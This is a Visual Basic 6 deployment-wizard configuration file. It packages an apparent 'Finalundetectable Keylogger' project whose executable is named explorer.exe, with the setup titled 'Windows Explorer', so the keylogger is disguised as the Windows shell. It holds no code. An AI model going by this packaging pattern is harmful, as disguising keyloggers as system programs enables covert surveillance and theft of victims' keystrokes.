[Root]
Most Recent Package=Standard Setup Package 1


[Package|Standard Setup Package 1|Root]
SubWizProgID=PDWizard.SetupPkgSubWiz
BuildFolder=c:\Program Files\Common Files

[Package|Standard Setup Package 1|Configure DAO ISAMs]
Applicable=No

[Package|Standard Setup Package 1|Configure DAO ODBC]
JetWorkspace=
ODBCDirect=

[Package|Standard Setup Package 1|Files Found]

[Package|Standard Setup Package 1|Files Released]

[Package|Standard Setup Package 1|Missing Dependency Information]
D:\nilesh\Projects\VBProjects\OCX\INIEdit.ocx=
C:\WINDOWS\system32\INIEdit.ocx=

[Package|Standard Setup Package 1|Out-of-Date Dependency Information]

[Package|Standard Setup Package 1|Files Added]
d:\nilesh\projects\vbprojects\finalundetectable keylogger2 kenames append\setting.ini=

[Package|Standard Setup Package 1|Files Removed]

[Package|Standard Setup Package 1|Files In Project]
C:\WINDOWS\system32\msvbvm60.dll=Yes
C:\WINDOWS\system32\oleaut32.dll=Yes
C:\WINDOWS\system32\olepro32.dll=Yes
C:\WINDOWS\system32\asycfilt.dll=Yes
C:\WINDOWS\system32\stdole2.tlb=Yes
C:\Program Files\Microsoft Visual Studio\VB98\Wizards\PDWizard\Redist\COMCAT.DLL=Yes
C:\Program Files\Microsoft Visual Studio\VB98\Wizards\PDWizard\SETUP.EXE=Yes
C:\Program Files\Microsoft Visual Studio\VB98\Wizards\PDWizard\SETUP1.EXE=Yes
C:\WINDOWS\system32\VB6STKIT.DLL=Yes
C:\Program Files\Microsoft Visual Studio\VB98\Wizards\PDWizard\ST6UNST.EXE=Yes
D:\nilesh\Projects\VBProjects\Finalundetectable Keylogger2 Kenames Append\setting.ini=Yes
D:\nilesh\Projects\VBProjects\Finalundetectable Keylogger2 Kenames Append\explorer.exe=Yes
C:\WINDOWS\system32\INIEdit.ocx=Yes

[Package|Standard Setup Package 1|Configure Registry Files]
Applicable=No

[Package|Standard Setup Package 1|Configure Remote Servers]
Applicable=No

[Package|Standard Setup Package 1|Install Locations]
D:\nilesh\Projects\VBProjects\Finalundetectable Keylogger2 Kenames Append\explorerlogmodepathchoice.exe=$(CommonFiles)
C:\WINDOWS\system32\msvbvm60.dll=$(WinSysPathSysFile)
C:\WINDOWS\system32\oleaut32.dll=$(WinSysPathSysFile)
C:\WINDOWS\system32\olepro32.dll=$(WinSysPathSysFile)
C:\WINDOWS\system32\asycfilt.dll=$(WinSysPathSysFile)
C:\WINDOWS\system32\stdole2.tlb=$(WinSysPathSysFile)
C:\Program Files\Microsoft Visual Studio\VB98\Wizards\PDWizard\Redist\COMCAT.DLL=$(WinSysPathSysFile)
D:\nilesh\Projects\VBProjects\OCX\INIEdit.ocx=$(WinSysPath)
C:\Program Files\Microsoft Visual Studio\VB98\Wizards\PDWizard\SETUP.EXE=$(AppPath)
C:\Program Files\Microsoft Visual Studio\VB98\Wizards\PDWizard\SETUP1.EXE=$(WinPath)
C:\WINDOWS\system32\VB6STKIT.DLL=$(WinSysPathSysFile)
C:\Program Files\Microsoft Visual Studio\VB98\Wizards\PDWizard\ST6UNST.EXE=$(WinPath)
D:\nilesh\Projects\VBProjects\Finalundetectable Keylogger2 Kenames Append\setting.ini=$(CommonFiles)
D:\nilesh\Projects\VBProjects\Finalundetectable Keylogger2 Kenames Append\explorer.exe=$(ProgramFiles)
C:\WINDOWS\system32\INIEdit.ocx=$(WinSysPath)

[Package|Standard Setup Package 1|Configure Shared Files]
Applicable=Yes
D:\nilesh\Projects\VBProjects\Finalundetectable Keylogger2 Kenames Append\explorer.exe=No

[Package|Standard Setup Package 1|Distribution]
Type=single
Size=
Title=Windows Explorer

[Package|Standard Setup Package 1|Package]
PackageFolder=c:\Program Files\Common Files
ProjectFolder=D:\nilesh\Projects\VBProjects\Finalundetectable Keylogger2 Kenames Append
ServerSideCab=
File1=c:\Program Files\Common Files\setup.exe
File2=c:\Program Files\Common Files\Setup.Lst
File3=c:\Program Files\Common Files\explorer.CAB
Handler1=PDWizard.FolderDplySubWiz
Handler2=PDWizard.WebPostDplySubWiz
